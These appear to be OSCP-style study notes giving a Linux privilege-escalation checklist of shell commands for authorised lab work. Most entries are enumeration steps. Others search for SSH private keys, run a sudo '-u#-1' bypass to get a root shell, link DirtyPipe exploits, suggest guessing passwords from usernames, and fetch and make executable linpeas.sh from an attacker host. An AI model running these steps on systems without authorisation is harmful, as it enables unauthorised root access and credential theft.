// notes/ PrivEsc — Linux
🐧
Checklist
Notes from oscp.adot8.com — linux privilege escalation.
#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/checklist ↗Checklist
🐺 howlsec@kalicode
01id🐺 howlsec@kalicode
01find / -group <groups> 2>/dev/null🐺 howlsec@kalicode
01history🐺 howlsec@kalicode
01sudo -l🐺 howlsec@kalicode
01sudo -V | grep version🐺 howlsec@kalicode
01find / -name id_rsa 2>/dev/null{% hint style="info" %} Research any binary with a SUID bit that looks out of place
https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits
DirtyPipe can be used to abuse custom SUID binaries
- 5.16.11
- 5.15.25
- 5.10.102
- 5.9.0 {% endhint %}
🐺 howlsec@kalicode
01ls -la /etc/passwd /etc/shadow🐺 howlsec@kalicode
01cat /etc/crontab
02crontab -l🐺 howlsec@kalicode
01getcap -r / 2>/dev/null
02/usr/sbin/getcap -r / 2>/dev/null🐺 howlsec@kalicode
01cat /etc/exports🐺 howlsec@kalicode
01ls -la /var/backups🐺 howlsec@kalicode
01sudo -u#-1 /bin/bash🐺 howlsec@kalicode
01dpkg -l🐺 howlsec@kalicode
01cat .bashrc{% hint style="info" %} Snoop on processes using pspy - some cron jobs may be running in the background
Research and enumerate literally every cron job running {% endhint %}
{% hint style="info" %} su into other users using their usernames as passwords; vagrant:vagrant {% endhint %}
Search for credentials in files
Run PEAS and LinEnum
🐺 howlsec@kalicode
01wget 192.168.45.x/linpeas.sh
02curl 192.168.45.x/linpeas.sh -o linpeas.sh
03chmod +x linpeas.sh{% hint style="danger" %} Search for exploits for sudo version {% endhint %}